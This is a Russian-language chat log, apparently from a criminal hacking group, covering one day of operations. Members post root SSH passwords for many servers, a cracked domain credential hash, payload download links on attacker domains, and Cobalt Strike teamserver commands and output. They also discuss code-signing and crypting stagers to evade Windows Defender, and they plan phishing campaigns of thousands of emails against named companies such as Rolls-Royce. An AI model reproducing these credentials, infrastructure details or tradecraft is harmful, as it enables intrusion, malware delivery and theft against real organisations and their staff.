[2024-01-25 00:03:53] @usernamenn:matrix.bestflowers247.online: ```
db480a8ad5b1858f23885b300a5a2fb9
f12619d19db2cea6b77eb6fa190eeaeb
```
--------------------
[2024-01-25 00:04:05] @usernamenn:matrix.bestflowers247.online: * ```
db480a8ad5b1858f23885b300a5a2fb9
f12619d19db2cea6b77eb6fa190eeaeb
2b87de139225da851fec6b90a150d002
```
--------------------
[2024-01-25 00:04:49] @usernamenn:matrix.bestflowers247.online: `ONTEX.NET/109329:$DCC2$10240#109329#6bb7f70ccee712285330f63f16dcb06a`
--------------------
[2024-01-25 06:45:37] @lapa:matrix.bestflowers247.online: Доброе утро!
--------------------
[2024-01-25 06:45:47] @lapa:matrix.bestflowers247.online: Короч деф обновился, уже палит павершелл
--------------------
[2024-01-25 07:15:18] @usernameyy:matrix.bestflowers247.online: ```
91.108.241.131
администратор
888Vahppp888000HsdFz
```
подключиться не могу, Lost connection
--------------------
[2024-01-25 08:45:11] @usernamett:matrix.bestflowers247.online: ```
for 25/01/2024


EU
-------------------------------------------------
proxychains ssh root@91.107.216.216 = trendistech.com +
root SSH Password:  RPEhjXm9FKUnu4gHvuh&x
-------------------------------------------------
proxychains ssh root@91.107.214.239 = pixeltechnical.com +
root SSH Password:  aV7aj4CEheawjafiP4r&3
-------------------------------------------------
proxychains ssh root@167.235.251.40 = pixelprofiti.com +
root SSH Password:  hEJpmpihRkpdgdcAtha&g
-------------------------------------------------

====================================================================================

USA
-------------------------------------------------
proxychains ssh root@149.248.12.109 = amacey.com +
Root Password: Ghbt3Yy6ATe$eK_T%utg
-------------------------------------------------
proxychains ssh root@144.202.126.10 = terripost.com +
Root Password: Ddf3#v+.MAoDBY8M7wHb1
-------------------------------------------------
proxychains ssh root@207.246.65.31 = terensfood.com +
Root Password: oHb@J2Ewm%Dug6CnBhg
-------------------------------------------------
```


--------------------
[2024-01-25 09:05:46] @usernameyy:matrix.bestflowers247.online: http://greenmotor.top
http://stuffsteven.top
--------------------
[2024-01-25 09:05:47] @usernameyy:matrix.bestflowers247.online: нужна замена
--------------------
[2024-01-25 09:08:20] @usernamegg:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> ```
> 91.108.241.131
> администратор
> 888Vahppp888000HsdFz
> ```
> подключиться не могу, Lost connection

так и не подключился ?
--------------------
[2024-01-25 09:08:35] @usernameyy:matrix.bestflowers247.online: ща
--------------------
[2024-01-25 09:09:25] @usernamegg:matrix.bestflowers247.online: ```
for 25/01/2024


EU
-------------------------------------------------
proxychains ssh root@91.107.216.216 = trendistech.com +
root SSH Password:  RPEhjXm9FKUnu4gHvuh&x
-------------------------------------------------
proxychains ssh root@91.107.214.239 = pixeltechnical.com +
root SSH Password:  aV7aj4CEheawjafiP4r&3
-------------------------------------------------
proxychains ssh root@167.235.251.40 = pixelprofiti.com +
root SSH Password:  hEJpmpihRkpdgdcAtha&g
-------------------------------------------------

====================================================================================

USA
-------------------------------------------------
proxychains ssh root@149.248.12.109 = amacey.com +
Root Password: Ghbt3Yy6ATe$eK_T%utg
-------------------------------------------------
proxychains ssh root@144.202.126.10 = terripost.com +
Root Password: Ddf3#v+.MAoDBY8M7wHb1
-------------------------------------------------
proxychains ssh root@207.246.65.31 = terensfood.com +
Root Password: oHb@J2Ewm%Dug6CnBhg
-------------------------------------------------
```


--------------------
[2024-01-25 09:09:32] @usernamegg:matrix.bestflowers247.online: что палит ?
--------------------
[2024-01-25 09:09:38] @usernamegg:matrix.bestflowers247.online: ехе ?
--------------------
[2024-01-25 09:09:58] @usernameyy:matrix.bestflowers247.online: да, та же надпись
--------------------
[2024-01-25 09:10:15] @usernameyy:matrix.bestflowers247.online: я пока установку коб делаю, инет плохо работает, гружу всё на сервак
--------------------
[2024-01-25 09:10:25] @usernameyy:matrix.bestflowers247.online: точнее инет хорошо работает, но я весь трафик занял загрузкой
--------------------
[2024-01-25 09:10:38] @usernameyy:matrix.bestflowers247.online: пока никто не работает у меня скорость хорошая)
--------------------
[2024-01-25 09:14:21] @usernamegg:matrix.bestflowers247.online: как это
--------------------
[2024-01-25 09:14:26] @usernamegg:matrix.bestflowers247.online: у тебя какой впн ?
--------------------
[2024-01-25 09:15:16] @usernameyy:matrix.bestflowers247.online: 83.242.96.127:443
--------------------
[2024-01-25 09:15:57] @lapa:matrix.bestflowers247.online: не знаю даже
--------------------
[2024-01-25 09:16:00] @lapa:matrix.bestflowers247.online: exe не может палить
--------------------
[2024-01-25 09:16:02] @lapa:matrix.bestflowers247.online: там путти
--------------------
[2024-01-25 09:16:02] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-25 09:16:07] @usernamegg:matrix.bestflowers247.online: нужен новый исходин ехе
--------------------
[2024-01-25 09:16:11] @usernamegg:matrix.bestflowers247.online: для точки
--------------------
[2024-01-25 09:16:15] @lapa:matrix.bestflowers247.online: скоро новые линки выдам, пусть переделает
--------------------
[2024-01-25 09:16:34] @usernamegg:matrix.bestflowers247.online: > <@chuck:talks.icu> сначала послать 10 писем, проверить что их прочитывают

вот сегодня так буду делать
--------------------
[2024-01-25 09:17:00] @lapa:matrix.bestflowers247.online: https://kitronits.com/4P6Hw2Q/{random}
https://unitedtechform.com/Eaql/{random}
https://trentform.com/pJx/{random}
--------------------
[2024-01-25 09:17:02] @usernamegg:matrix.bestflowers247.online: > <@chuck:talks.icu> 1400 - если они все дошли, там админ наверное в ахуе пребывает ))

не все запустят и отроют
--------------------
[2024-01-25 09:17:05] @lapa:matrix.bestflowers247.online: вот
--------------------
[2024-01-25 09:17:09] @usernamegg:matrix.bestflowers247.online: там сложная система у него
--------------------
[2024-01-25 09:17:35] @usernamegg:matrix.bestflowers247.online: что делаем ?
--------------------
[2024-01-25 09:17:40] @usernamegg:matrix.bestflowers247.online: такой же пейлоад как вчера ?
--------------------
[2024-01-25 09:17:44] @lapa:matrix.bestflowers247.online: ну да
--------------------
[2024-01-25 09:17:47] @lapa:matrix.bestflowers247.online: html
--------------------
[2024-01-25 09:17:51] @lapa:matrix.bestflowers247.online: пусть сделает
--------------------
[2024-01-25 09:18:02] @lapa:matrix.bestflowers247.online: по италии прошлю, посмотрю сколько будет запусков
--------------------
[2024-01-25 09:18:17] @lapa:matrix.bestflowers247.online: и на итальянском пусть сделает языке
--------------------
[2024-01-25 09:18:32] @usernamegg:matrix.bestflowers247.online: только его пока нет
--------------------
[2024-01-25 09:19:14] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 09:19:59] @chuck:talks.icu: привет
--------------------
[2024-01-25 09:20:16] @chuck:talks.icu: исходник на ту же группу?
--------------------
[2024-01-25 10:17:51] @chuck:talks.icu: stager_1_bmw01_x64.exe
--------------------
[2024-01-25 10:54:04] @lapa:matrix.bestflowers247.online: не пришел еще он ?
--------------------
[2024-01-25 10:57:02] @usernameyy:matrix.bestflowers247.online: ```
>>> Coba PROXY <<<
port: 17081
ssh -p17081 root@170.130.165.97
vmhKc2KnX5AhNZdyLq0hFzj2THAtoSZf56Q
domain: globalusa.net
https://globalusa.net (Ports: 80,443,8080,8888,7575,4444)
----------------------------------------------------------------------------------------
>>> Coba SERVER 4.8 TE <<<
port: 13825
ip/port: 51.89.62.218:13825
ssh -p13825 root@51.89.62.218
blbgDu6KNV2XcU1URO19BickqTWiZJ0AGKI

COBA://51.89.62.218:53372
ZRo4cF7BUOHFE0H6ajFVQaQn8ANKq73tC6D

./teamserver 51.89.62.218 ZRo4cF7BUOHFE0H6ajFVQaQn8ANKq73tC6D ./xxxx.profile
----------------------------------------------------------------------------------------

--------------------
[2024-01-25 10:57:08] @usernameyy:matrix.bestflowers247.online: 4.9.1 первая коба
--------------------
[2024-01-25 10:57:25] @usernameyy:matrix.bestflowers247.online: ```
COB INSTALL
http://193.56.8.57/

basic:

CHbI94Dz7HyFMYcZugtCMYni7UzOFv2uX
|%wDh3mmT*8*uMFt6DtLIv(0skr[L8tCY
--------------------
[2024-01-25 10:57:30] @usernameyy:matrix.bestflowers247.online: как устанавливать помните?
--------------------
[2024-01-25 10:57:37] @usernameyy:matrix.bestflowers247.online: image.png
--------------------
[2024-01-25 10:57:45] @usernameyy:matrix.bestflowers247.online: и + галочка на носки
--------------------
[2024-01-25 11:05:51] @usernameyy:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> так и не подключился ?

отписал хостеру по этому поводу?
--------------------
[2024-01-25 11:06:17] @usernameyy:matrix.bestflowers247.online: я закончил с кобами, могу приступить к ббгруп. Сегодня доделаю пинг в брейкере, с завтрашнего дня начну делать днс
--------------------
[2024-01-25 11:20:24] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2024-01-25 11:22:41] @usernamegg:matrix.bestflowers247.online: stager_1_bmw01_x64.exe
--------------------
[2024-01-25 11:22:46] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 11:22:49] @usernamegg:matrix.bestflowers247.online: принял
--------------------
[2024-01-25 11:22:54] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 11:23:10] @usernamegg:matrix.bestflowers247.online: Сверяйте контакты (Host Аренда vps vds) Создание сайтов vpskot, [25 янв. 2024 г., 13:43:58]:
45.81.225.79
администратор
888Vahppp888000HsdFz

пробуй по этому айпи подключиться
--------------------
[2024-01-25 11:23:18] @usernamegg:matrix.bestflowers247.online: *
45.81.225.79
администратор
888Vahppp888000HsdFz

пробуй по этому айпи подключиться
--------------------
[2024-01-25 11:23:30] @muaddib6:matrix.org: Принял. Занимаюсь.
--------------------
[2024-01-25 11:23:35] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 11:25:03] @usernameyy:matrix.bestflowers247.online: норм, там впн стоит
--------------------
[2024-01-25 11:25:04] @usernameyy:matrix.bestflowers247.online: это ок?
--------------------
[2024-01-25 11:25:14] @usernamegg:matrix.bestflowers247.online: не знаю
--------------------
[2024-01-25 11:25:31] @usernameyy:matrix.bestflowers247.online: image.png
--------------------
[2024-01-25 11:28:07] @usernamegg:matrix.bestflowers247.online: квак выдал ехе новый
--------------------
[2024-01-25 11:28:23] @usernamegg:matrix.bestflowers247.online: я пка другим дам эти линки под сбор еще для точки
--------------------
[2024-01-25 11:30:24] @lapa:matrix.bestflowers247.online: хорошо
--------------------
[2024-01-25 11:38:36] @chuck:talks.icu: ок
--------------------
[2024-01-25 11:42:00] @cob_crypt_ward:matrix.bestflowers247.online: привет, так BRC4 нужно будет вам криптовать?
--------------------
[2024-01-25 11:42:06] @cob_crypt_ward:matrix.bestflowers247.online: или вы не видите в нем смысла?
--------------------
[2024-01-25 12:03:16] @usernameyy:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> 45.81.225.79
> администратор
> 888Vahppp888000HsdFz
>
> пробуй по этому айпи подключиться

мне нужно чтобы он поставил версию на английском
--------------------
[2024-01-25 12:03:27] @usernameyy:matrix.bestflowers247.online: и что за впн тут открыт
--------------------
[2024-01-25 12:05:24] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> stager_1_bmw01_x64.exe

строка kobntir4ghn9gnirvon34v809n4g
подписаны
--------------------
[2024-01-25 12:05:24] @burito:matrix.bestflowers247.online: signed_5676DC4C8.7z
--------------------
[2024-01-25 12:06:05] @usernamegg:matrix.bestflowers247.online: тунель это
--------------------
[2024-01-25 12:09:13] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent an image.


```
выслали

авторизация на сайте: https://portswigger.net/users?tid=3a5_mQvetSXhFoxoxBZO_gslkoodk0h84MlpDY6Kd_tlA73_mPryW1hey3t17iML

email: james_maxammjpj@outlook.com
pass: ^D25gRJZbA?_22643:4rA2Tk!Xn]#2"s
```
--------------------
[2024-01-25 12:09:35] @usernamegg:matrix.bestflowers247.online: 
```
выслали

авторизация на сайте: https://portswigger.net/users?tid=3a5_mQvetSXhFoxoxBZO_gslkoodk0h84MlpDY6Kd_tlA73_mPryW1hey3t17iML

email: james_maxammjpj@outlook.com
pass: ^D25gRJZbA?_22643:4rA2Tk!Xn]#2"s
```
--------------------
[2024-01-25 12:10:22] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-25 12:10:23] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 12:10:26] @usernamegg:matrix.bestflowers247.online: пока таргетов нет
--------------------
[2024-01-25 12:10:30] @usernamegg:matrix.bestflowers247.online: но скоро будут
--------------------
[2024-01-25 12:10:34] @cob_crypt_ward:matrix.bestflowers247.online: хорошо
--------------------
[2024-01-25 12:11:05] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 12:11:12] @usernamegg:matrix.bestflowers247.online: signed_5676DC4C8.7z
--------------------
[2024-01-25 12:11:14] @usernamegg:matrix.bestflowers247.online: строка kobntir4ghn9gnirvon34v809n4g
подписаны
--------------------
[2024-01-25 12:12:16] @usernamess:matrix.bestflowers247.online: ok
--------------------
[2024-01-25 12:13:25] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-25 12:15:39] @lapa:matrix.bestflowers247.online: скоро пролью
--------------------
[2024-01-25 12:15:52] @lapa:matrix.bestflowers247.online: а нагрузку какую делают? ДЖС ?
--------------------
[2024-01-25 12:17:15] @usernamegg:matrix.bestflowers247.online: ```
[15:12:53] сборщик - iso + lnk : string exeUrl = "https://kitronits.com/4P6Hw2Q/" + Guid.NewGuid().ToString("N");
[15:13:02] сборщик - iso + lnk : конфиг свежонаписаний так что стаб уникальний всё рандомно
[15:13:24] сборщик - iso + lnk : JKUdkskjdksakdjsjksa3294324!!!_!!@31
[15:13:29] сборщик - iso + lnk : первый домен 100шт
[15:14:39] сборщик - iso + lnk : Download: https://qaz.im/load/ShZiEn/48a3566f-deb1-49c1-ad9c-efe7b2957213
Delete: https://qaz.im/index.php?a=delete&q=48a3566f-deb1-49c1-ad9c-efe7b2957213
```
--------------------
[2024-01-25 12:18:01] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-25 12:21:50] @lapa:matrix.bestflowers247.online: скоро скачаю, подпишу msi и проверю
--------------------
[2024-01-25 12:28:36] @lapa:matrix.bestflowers247.online: вакатак на msi
--------------------
[2024-01-25 12:28:42] @lapa:matrix.bestflowers247.online: ща без подписи проверю
--------------------
[2024-01-25 12:30:16] @lapa:matrix.bestflowers247.online: Trojan:Script/Ulthar.A!ml не могу скачать
--------------------
[2024-01-25 12:30:36] @lapa:matrix.bestflowers247.online: его файл залил на файлообменник и не дает скачать msi просто
--------------------
[2024-01-25 12:34:29] @usernamegg:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> http://greenmotor.top
> http://stuffsteven.top

для блога через фастфлюкс делали мы их так ?
--------------------
[2024-01-25 12:34:44] @usernameyy:matrix.bestflowers247.online: да, 2 домена
--------------------
[2024-01-25 12:34:45] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 12:34:59] @usernamegg:matrix.bestflowers247.online: [15:30:01] сборщик - iso + lnk : виндовс какой?
[15:30:19] сборщик - iso + lnk : и какой билд ?
--------------------
[2024-01-25 12:35:02] @usernameyy:matrix.bestflowers247.online: 95.217.40.220
178.236.246.147
--------------------
[2024-01-25 12:35:07] @usernameyy:matrix.bestflowers247.online: айпишники к которым надо привязать
--------------------
[2024-01-25 12:36:03] @lapa:matrix.bestflowers247.online: build-097.msi
--------------------
[2024-01-25 12:36:11] @lapa:matrix.bestflowers247.online: build-097.msi
--------------------
[2024-01-25 12:36:12] @lapa:matrix.bestflowers247.online: windows 10
--------------------
[2024-01-25 12:36:24] @lapa:matrix.bestflowers247.online: без админ проверяю
--------------------
[2024-01-25 12:36:56] @usernamegg:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> мне нужно чтобы он поставил версию на английском



там англ версия стоит как я  вижу.


нужно другую ? эта не подходит ?
--------------------
[2024-01-25 12:38:25] @usernameyy:matrix.bestflowers247.online: там имя на русском и папка
--------------------
[2024-01-25 12:38:37] @usernameyy:matrix.bestflowers247.online: язык только английский стоит, у меня уже было такое, в консоль вопросики будут писаться
--------------------
[2024-01-25 12:39:19] @usernameyy:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> там имя на русском и папка

и логин кстати тоже на русском, прям "администратор"
--------------------
[2024-01-25 12:39:38] @lapa:matrix.bestflowers247.online: ща еще проверю другой файл
--------------------
[2024-01-25 12:40:09] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> sent a file.

Готово
--------------------
[2024-01-25 12:40:13] @lapa:matrix.bestflowers247.online: можно ему дедик выдать
--------------------
[2024-01-25 12:40:16] @muaddib6:matrix.org: 1.7z
--------------------
[2024-01-25 12:40:25] @muaddib6:matrix.org: MFKXcahoKuoQaRyxOkGBjWByIGgjMEljCGdUMKkSEPfpCAI
--------------------
[2024-01-25 12:40:27] @muaddib6:matrix.org: строка
--------------------
[2024-01-25 12:40:39] @lapa:matrix.bestflowers247.online: ну да, не могу скачать
--------------------
[2024-01-25 12:40:54] @lapa:matrix.bestflowers247.online: Main IP: 38.154.242.28

Username: john
Password: Kmnc52wP1Dqa
--------------------
[2024-01-25 12:40:58] @lapa:matrix.bestflowers247.online: он сам тут может проверить
--------------------
[2024-01-25 12:41:28] @usernamegg:matrix.bestflowers247.online: [15:38:50] сборщик - iso + lnk : скачай не с файлообменика а к примеру со своего доменна
[15:39:22] сборщик - iso + lnk : на temp.sh такая херня может быть там сразу будет агриться из за домена
[15:39:30] сборщик - iso + lnk : я могу залить например на тестовую впс
--------------------
[2024-01-25 12:41:42] @usernamegg:matrix.bestflowers247.online: я тебе давно говорю не кафай ты с фо
--------------------
[2024-01-25 12:42:39] @usernamegg:matrix.bestflowers247.online: это я заметил
--------------------
[2024-01-25 12:43:43] @lapa:matrix.bestflowers247.online: file.io
--------------------
[2024-01-25 12:43:43] @usernamegg:matrix.bestflowers247.online: этот хостер блин
--------------------
[2024-01-25 12:43:52] @lapa:matrix.bestflowers247.online: отсюда скачивал
--------------------
[2024-01-25 12:43:55] @usernamegg:matrix.bestflowers247.online: кто ему показал что н может серверами торговать
--------------------
[2024-01-25 12:43:56] @usernamegg:matrix.bestflowers247.online: (
--------------------
[2024-01-25 12:44:04] @usernameyy:matrix.bestflowers247.online: ахахахахах
--------------------
[2024-01-25 12:44:09] @lapa:matrix.bestflowers247.online: ок, скоро сделаю свои линки
--------------------
[2024-01-25 12:44:11] @lapa:matrix.bestflowers247.online: и проверю
--------------------
[2024-01-25 12:44:52] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 12:45:47] @lapa:matrix.bestflowers247.online: чисто
--------------------
[2024-01-25 12:45:51] @lapa:matrix.bestflowers247.online: со своего линка скачалось
--------------------
[2024-01-25 12:45:54] @lapa:matrix.bestflowers247.online: и подпись валидная
--------------------
[2024-01-25 12:46:05] @lapa:matrix.bestflowers247.online: значит подпись была невалидная из-за msi
--------------------
[2024-01-25 12:46:08] @lapa:matrix.bestflowers247.online: вчера
--------------------
[2024-01-25 12:46:12] @usernamegg:matrix.bestflowers247.online: [15:45:21] сборщик - iso + lnk : https://prnt.sc/aCs4kMSnooFq
на 11тке также чисто
--------------------
[2024-01-25 12:46:21] @usernamegg:matrix.bestflowers247.online: ну вот
--------------------
[2024-01-25 12:48:41] @lapa:matrix.bestflowers247.online: мы по кому будем это слать?
--------------------
[2024-01-25 12:49:14] @usernamegg:matrix.bestflowers247.online: ```
179.60.150.188
root
Q83n8w7GK3%66M^9GNe7fo0E7Amfk8$
```
--------------------
[2024-01-25 12:49:33] @usernamegg:matrix.bestflowers247.online: 1.7z
--------------------
[2024-01-25 12:49:34] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 12:49:39] @usernamegg:matrix.bestflowers247.online: MFKXcahoKuoQaRyxOkGBjWByIGgjMEljCGdUMKkSEPfpCAI
строка
--------------------
[2024-01-25 12:49:43] @usernamegg:matrix.bestflowers247.online: от бентли
--------------------
[2024-01-25 12:49:52] @lapa:matrix.bestflowers247.online: ну тот exe чистый
--------------------
[2024-01-25 12:51:37] @usernamegg:matrix.bestflowers247.online: WHAFHGROUPBuLYq7HVJkTCYmnZqeZZPXZYftidvvsbXDjshZ0d
--------------------
[2024-01-25 12:51:46] @lapa:matrix.bestflowers247.online: можно 10к писем прослачить чисто по крупным еврокомпаниям
--------------------
[2024-01-25 12:51:52] @lapa:matrix.bestflowers247.online: * можно 10к писем прослать чисто по крупным еврокомпаниям
--------------------
[2024-01-25 12:52:18] @usernamegg:matrix.bestflowers247.online: /data/www/WHAFHGROUPBuLYq7HVJkTCYmnZqeZZPXZYftidvvsbXDjshZ0d/
--------------------
[2024-01-25 12:52:45] @usernamegg:matrix.bestflowers247.online: не
--------------------
[2024-01-25 12:52:50] @usernamegg:matrix.bestflowers247.online: нас квак не простит тогда
--------------------
[2024-01-25 12:52:53] @usernamegg:matrix.bestflowers247.online: я обещаение ему дал
--------------------
[2024-01-25 12:52:58] @usernamegg:matrix.bestflowers247.online: что бы только точку на его софт шлем
--------------------
[2024-01-25 12:53:07] @usernamegg:matrix.bestflowers247.online: шлем только тех кого вчера обсуждали и кого я почты дал
--------------------
[2024-01-25 12:53:10] @usernamegg:matrix.bestflowers247.online: две компании
--------------------
[2024-01-25 12:53:44] @lapa:matrix.bestflowers247.online: хорошо
--------------------
[2024-01-25 12:53:50] @lapa:matrix.bestflowers247.online: линками прошлем
--------------------
[2024-01-25 12:53:56] @lapa:matrix.bestflowers247.online: но тогда запущу в 19 00
--------------------
[2024-01-25 12:54:00] @lapa:matrix.bestflowers247.online: юса же спит
--------------------
[2024-01-25 12:54:05] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2024-01-25 12:54:07] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2024-01-25 12:54:36] @usernamegg:matrix.bestflowers247.online: еще одну компанию добавим
--------------------
[2024-01-25 12:54:38] @usernamegg:matrix.bestflowers247.online: RR
--------------------
[2024-01-25 12:55:06] @lapa:matrix.bestflowers247.online: а домен какой?
--------------------
[2024-01-25 12:57:22] @usernamenn:matrix.bestflowers247.online: rolls-royce.com
--------------------
[2024-01-25 12:57:37] @usernamegg:matrix.bestflowers247.online: rolls-roycemotorcars.com
rolls-royce.com
--------------------
[2024-01-25 12:57:43] @usernamegg:matrix.bestflowers247.online: 100к мыльников есть
--------------------
[2024-01-25 12:57:48] @usernamegg:matrix.bestflowers247.online: но все слать не будем
--------------------
[2024-01-25 12:57:53] @usernamegg:matrix.bestflowers247.online: 10к прошлем
--------------------
[2024-01-25 12:57:57] @usernamenn:matrix.bestflowers247.online: RRmails.txt
--------------------
[2024-01-25 12:57:58] @usernamegg:matrix.bestflowers247.online: квак нас выпнет из ботнета
--------------------
[2024-01-25 12:58:02] @usernamegg:matrix.bestflowers247.online: он очкует сильно
--------------------
[2024-01-25 12:58:38] @usernamegg:matrix.bestflowers247.online: RRmails.txt
--------------------
[2024-01-25 12:58:57] @usernamegg:matrix.bestflowers247.online: вот мыльники по ним
--------------------
[2024-01-25 12:59:01] @usernamegg:matrix.bestflowers247.online: три компании шлем значит
--------------------
[2024-01-25 12:59:58] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-25 13:00:01] @usernamegg:matrix.bestflowers247.online: ajq.com шлем все 3782
cygnusdelivers.com schwans.com - по ним
--------------------
[2024-01-25 13:00:13] @usernamegg:matrix.bestflowers247.online: * ajq.com шлем все 3782
cygnusdelivers.com schwans.com - по ним
rolls-roycemotorcars.com
rolls-royce.com
--------------------
[2024-01-25 13:00:24] @usernamegg:matrix.bestflowers247.online: ну короче вот этих ребяток сегодня пробуем
--------------------
[2024-01-25 13:00:27] @lapa:matrix.bestflowers247.online: RR вроде же не один раз ловили
--------------------
[2024-01-25 13:00:30] @lapa:matrix.bestflowers247.online: отвалиюватся?
--------------------
[2024-01-25 13:00:44] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ну короче вот этих ребяток сегодня пробуем

+
--------------------
[2024-01-25 13:03:51] @usernamegg:matrix.bestflowers247.online: ```
[15:46:16] сборщик - iso + lnk : +
[15:46:27] сборщик - iso + lnk : ну да изза файлообменника
[15:51:06] сборщик - iso + lnk : Download: https://qaz.im/load/4RaRzT/1dca43c5-6a29-45a5-a7f1-b2847803e2ee
Delete: https://qaz.im/index.php?a=delete&q=1dca43c5-6a29-45a5-a7f1-b2847803e2ee
[15:51:15] сборщик - iso + lnk : msi2exe_21jfdhsfdjh@!@!@#@kfjdsfkds
[15:51:33] сборщик - iso + lnk : https://unitedtechform.com/Eaql/{random}
```
--------------------
[2024-01-25 13:04:25] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-25 13:08:18] @usernamecc:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> WHAFHGROUPBuLYq7HVJkTCYmnZqeZZPXZYftidvvsbXDjshZ0d

```
http://temp.sh/toWJe/g5f4q2Sh6k9ceb8JjyrVt3KpQswD.zip
g5f4q2Sh6k9ceb8JjyrVt3KpQswD.zip
extract pass: Ajxk3q64um7eYXzvZUgEVKcyDsdC
```
--------------------
[2024-01-25 13:11:54] @usernamecc:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> как устанавливать помните?

все помню ++ записал все себе
--------------------
[2024-01-25 13:23:17] @usernamezz:matrix.bestflowers247.online: 1_443
--------------------
[2024-01-25 13:29:22] @usernamegg:matrix.bestflowers247.online: [16:20:51] сборщик - iso + lnk : msi3fdskjfjdjdjfjds&*@&#@#@!
[16:21:04] сборщик - iso + lnk : https://trentform.com/pJx/{random}
[16:23:36] сборщик - iso + lnk : Download: https://qaz.im/load/9iGRQ6/89f9f1f6-3a39-44d9-8f48-f7f44a6bef8a
Delete: https://qaz.im/index.php?a=delete&q=89f9f1f6-3a39-44d9-8f48-f7f44a6bef8a
--------------------
[2024-01-25 13:29:26] @usernamegg:matrix.bestflowers247.online: * ```
\[16:20:51\] сборщик - iso + lnk : msi3fdskjfjdjdjfjds&\*@&#@#@!
\[16:21:04\] сборщик - iso + lnk : https://trentform.com/pJx/{random}
\[16:23:36\] сборщик - iso + lnk : Download: https://qaz.im/load/9iGRQ6/89f9f1f6-3a39-44d9-8f48-f7f44a6bef8a
Delete: https://qaz.im/index.php?a=delete&q=89f9f1f6-3a39-44d9-8f48-f7f44a6bef8a
```
--------------------
[2024-01-25 13:29:34] @usernamegg:matrix.bestflowers247.online: * [16:20:51] сборщик - iso + lnk : msi3fdskjfjdjdjfjds&*@&#@#@!
[16:21:04] сборщик - iso + lnk : https://trentform.com/pJx/{random}
[16:23:36] сборщик - iso + lnk : Download: https://qaz.im/load/9iGRQ6/89f9f1f6-3a39-44d9-8f48-f7f44a6bef8a
Delete: https://qaz.im/index.php?a=delete&q=89f9f1f6-3a39-44d9-8f48-f7f44a6bef8a
--------------------
[2024-01-25 13:29:41] @usernamegg:matrix.bestflowers247.online: * ```
\[16:20:51\] сборщик - iso + lnk : msi3fdskjfjdjdjfjds&\*@&#@#@!
\[16:21:04\] сборщик - iso + lnk : https://trentform.com/pJx/{random}
\[16:23:36\] сборщик - iso + lnk : Download: https://qaz.im/load/9iGRQ6/89f9f1f6-3a39-44d9-8f48-f7f44a6bef8a
Delete: https://qaz.im/index.php?a=delete&q=89f9f1f6-3a39-44d9-8f48-f7f44a6bef8a
```
--------------------
[2024-01-25 13:31:03] @u123:matrix.bestflowers247.online: привет
--------------------
[2024-01-25 13:31:05] @u123:matrix.bestflowers247.online: sudo ./teamserver 193.124.22.200 xec3lahkie2ni5Va thevbcnewsreal.com.profile

[*] Will use existing X509 certificate and keystore (for SSL)

[] Starting teamserver
[] Team Server Version: 4.9.1 Licensed
[] Setting 'https.protocols' system property: SSLv3,SSLv2Hello,TLSv1,TLSv1.1,TLSv1.2,TLSv1.3
[+] I see you're into threat replication. thevbcnewsreal.com.profile loaded.
[] Loading keystrokes.
[] Loaded 0 keystrokes.
[] Loading screenshots.
[] Loaded 0 screenshots.
[] Loading downloads.
[] Loaded 0 downloads.
[] Loading Windows error codes.
[] Windows error codes loaded
[] Loading hosted files
[] Loaded 0 servers with hosted items
[] Loading beacons
[] Loaded 0 beacons
[!] Woah! Your profile disables hosted payload stages. Payload staging won't work.
[+] Team server is up on 0.0.0.0:25525
[] SHA256 hash of SSL cert is: 538e800c759323311d0487d680a43ee46f372703b4d46d432d820e326222b3b5
--------------------
[2024-01-25 13:31:24] @u123:matrix.bestflowers247.online: stage payload отключены
--------------------
[2024-01-25 13:31:33] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-01-25 13:31:35] @usernamegg:matrix.bestflowers247.online: принял
--------------------
[2024-01-25 13:31:43] @usernamegg:matrix.bestflowers247.online: sudo ./teamserver 193.124.22.200 xec3lahkie2ni5Va thevbcnewsreal.com.profile

[*] Will use existing X509 certificate and keystore (for SSL)

[] Starting teamserver
[] Team Server Version: 4.9.1 Licensed
[] Setting 'https.protocols' system property: SSLv3,SSLv2Hello,TLSv1,TLSv1.1,TLSv1.2,TLSv1.3
[+] I see you're into threat replication. thevbcnewsreal.com.profile loaded.
[] Loading keystrokes.
[] Loaded 0 keystrokes.
[] Loading screenshots.
[] Loaded 0 screenshots.
[] Loading downloads.
[] Loaded 0 downloads.
[] Loading Windows error codes.
[] Windows error codes loaded
[] Loading hosted files
[] Loaded 0 servers with hosted items
[] Loading beacons
[] Loaded 0 beacons
[!] Woah! Your profile disables hosted payload stages. Payload staging won't work.
[+] Team server is up on 0.0.0.0:25525
[] SHA256 hash of SSL cert is: 538e800c759323311d0487d680a43ee46f372703b4d46d432d820e326222b3b5
--------------------
